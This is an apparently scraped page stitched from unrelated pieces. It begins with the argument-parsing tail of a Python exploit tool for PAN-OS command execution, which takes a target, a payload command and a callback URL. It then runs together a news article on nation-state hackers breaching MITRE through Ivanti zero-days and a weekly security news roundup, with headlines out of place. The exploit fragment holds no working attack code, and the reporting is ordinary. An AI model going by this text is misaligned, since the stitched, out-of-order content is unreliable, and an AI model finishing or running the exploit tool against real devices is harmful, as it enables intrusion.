"--target",help="Target to send payload to", required=True )    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )    #---------------------------------------    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )    args = parser.parse_args(selection)    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])        if args.module == "exploit":            cmdexec(args.target, args.callbackurl, args.payload)    if args.module == "check":        check_vuln(args.target, args.filename)if __name__ == "__main__":    argparser()    print("Finished !")

Palo Alto PAN-OS Command Execution / Arbitrary File Creation

The irony is lost on few, as a nation-state threat actor used eight MITRE techniques to breach MITRE itself — including exploiting the Ivanti bugs that attackers have been swarming on for months.

Source: Kristoffer Tripplaar via Alamy Stock Photo

Foreign nation-state hackers have used vulnerable Ivanti edge devices to gain three months' worth of "deep" access to one of MITRE Corp.'s unclassified networks.

MITRE, steward of the ubiquitous ATT&CK glossary of commonly known cyberattack techniques, previously went 15 years without a major incident. The streak snapped in January when, like so many other organizations, its Ivanti gateway devices were exploited.

The breach affected the Networked Experimentation, Research, and Virtualization Environment (NERVE), an unclassified, collaborative network the organization uses for research, development, and prototyping. The extent of the NERVE damage (pun intended) is currently being assessed.

Dark Reading reached out to MITRE to confirm the timeline and details of the attack. MITRE did not provide further clarification.

**MITRE's ATT&CK**

Stop me if you've heard this one before: In January, after an initial reconnaissance period, a threat actor exploited one of the company's virtual private networks (VPNs) through two Ivanti Connect Secure zero-day vulnerabilities (ATT&CK technique T1190, Exploit Public-Facing Applications).

According to a blog post from MITRE's Center for Threat-Informed Defense, the attackers bypassed the multifactor authentication (MFA) protecting the system with some session hijacking (MITRE ATT&CK T1563, Remote Service Session Hijacking).

They attempted to leverage several different remote services (T1021, Remote Services), including the Remote Desktop Protocol (RDP) and Secure Shell (SSH), to gain access to a valid administrator account (T1078, Valid Accounts). With it, they pivoted and "dug deep" into the network's VMware virtualization infrastructure.

There, they deployed Web shells (T1505.003, Server Software Component: Web Shell) for persistence, and backdoors to run commands (T1059, Command and Scripting Interpreter) and steal credentials, exfiltrating any stolen data to a command-and-control server (T1041, Exfiltration Over C2 Channel). To hide this activity, the group created its own virtual instances to run within the environment (T1564.006, Hide Artifacts: Run Virtual Instance).

**MITRE's Defense**

"The impact of this cyberattack should not be taken lightly," says Darren Guccione, CEO and co-founder at Keeper Security, highlighting "both the foreign ties of the attackers and the ability of the attackers to exploit two serious zero-day vulnerabilities in their quest to compromise MITRE’s NERVE, which could potentially expose sensitive research data and intellectual property."

He posits, "Nation-state actors often have strategic motivations behind their cyber operations, and the targeting of a prominent research institution like MITRE, that works on behalf of the US government, could be just one component of a larger effort."

Whatever its goals were, the hackers had ample time to carry them out. Though the compromise occurred in January, MITRE was only able to detect it in April, leaving a quarter-year gap in between.

"MITRE followed best practices, vendor instructions, and the government’s advice to upgrade, replace, and harden our Ivanti system," the organization wrote on Medium, "but we did not detect the lateral movement into our VMware infrastructure. At the time we believed we took all the necessary actions to mitigate the vulnerability, but these actions were clearly insufficient."

Editor's note: An earlier version of the story attributed the attacks to UNC5221. That attribution has not been made at this time.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

MITRE ATT&amp;CKED: InfoSec's Most Trusted Name Falls to Ivanti Bugs

Plus: New York’s legislature suffers a cyberattack, police disrupt a global phishing operation, and Apple removes encrypted messaging apps in China.

Looking for love? Be careful what you wish for.

A loose-knit community of con artists known as Yahoo Boys has begun using real-time face-swap technology to woo victims with romance scams. Using a variety of tools and techniques, the scammers use AI-powered apps to make themselves look like entirely different people on video calls. Just remember: If someone you’ve never met IRL is asking you for money, just say no.

Elsewhere in the world of harmful deepfakes, two major websites used for creating fake nude images of people are now blocked in the United Kingdom. The censorship, which appears to be self-imposed, comes just days after the UK proposed legislation that would ban nonconsensual, sexualized AI-generated images.

A Russian cybercriminal gang called Cyber Army of Russia Reborn appears to have been created with the help of Sandworm, the notorious Russian military hacking unit that has carried out devastating cyberattacks against Ukraine for years. The difference? Cyber Army of Russia Reborn is even more brazen, taking credit for attacks against critical infrastructure in Europe and the United States.

Change Healthcare’s ransomware saga entered a new chapter this week. A cybercriminal group called RansomHub claims to be selling highly sensitive patient information stolen from the company. The sale follows RansomHub’s claims that it possesses terabytes of data stolen in a February attack by another ransomware gang known as AlphV or Black Cat, which received a $22 million payment in March. Change Healthcare says it has spent $872 million response to the ransomware attack as of March 31.

The biggest global surveillance program carried out by the US may be about to get bigger. A two-year renewal of Section 702 of the Foreign Intelligence Surveillance Act, which technically expired on Friday, will soon go up for a vote by the US Senate after passing the House last week. Included in the legislation is a provision that would greatly expand the number of businesses that could be conscripted to spy on behalf of the US government, which critics have called the “Stasi provision.” One of the largest lobbying firms for Big Tech companies has opposed the provision over fears that tech industry workers could be forced to become informants.

That’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

There’s a kernel of truth in every good fiction, which is why the very real Defense Advanced Research Projects Agency, or Darpa, is a constant go-to for shows like the _X-Files_ and games like _Metal Gear Solid_. It tends to pop up whenever a shadowy government agency is needed to reverse engineer a stolen alien artifact or construct a giant killer robot. A Darpa announcement this Thursday, however, sounds almost too much like the opening sequence of a Hideo Kojima game: With the help of the US Air Force Test Pilot School, the agency says an experimental aircraft known as the X-62 was successfully flown by artificial intelligence during a simulated dogfight against a human pilot in an F-16. “The potential for autonomous air-to-air combat has been imaginable for decades,” US Air Force secretary Frank Kendall says, “but the reality has remained a distant dream up until now.”

**New York State Legislature Hit by Cyberattack**

Details are scant as to the impact, but for at least several hours this week, hackers felled computer systems supporting the work of New York’s state legislature. While an attack on something called the Legislative Bill Drafting Commission isn’t quite as jaw-dropping as one against a power plant or a naval base, the LBDC is one of a dozen required stops that legislation in New York must make en route to becoming law. Bills can’t be introduced, amended, or reviewed by committee without it, much less get a vote. Luckily, the agency reports it was able to get back on its feet within a few hours using a “backup system.” An investigation of the attack is ongoing.

**Police Disrupt Global Phishing Operation**

An armada of law enforcement agencies arrested 37 suspects around the world last weekend in an operation targeting LabHost, reportedly one of the world’s largest phishing-as-a-service platforms. The investigation was spearheaded by the London Metropolitan Police in cooperation with Europol. Investigators uncovered a whopping 40,000 phishing domains being operated by as many as 10,000 users worldwide, Europol says. LabHost charged a monthly fee of $249. That cybercriminals have discovered the psychological benefits of just-below pricing is yet another sign of the growing popularity and sophistication of these markets.

**Apple Removes Encrypted Messaging Apps in China**

Encrypted messaging apps WhatsApp, Signal, and Telegram have gone the way of Winnie the Pooh. Citing “national security concerns,” China ordered Apple to delete “certain apps” from its Chinese App Store this week, the tech behemoth announced (while neglecting to specify which ones). Apple reportedly met with Chinese authorities to express concern over how banning the apps would impact its users but relented after being met with a stone wall. “We are obligated to follow the laws in the countries where we operate,” the company said, “even when we disagree.” Apple is heavily dependent on China’s workforce to manufacture its products, and sales in the region have topped $70 billion in recent years. That Apple has become beholden to the Chinese government because of this is no longer much of a secret.

Tag

#apple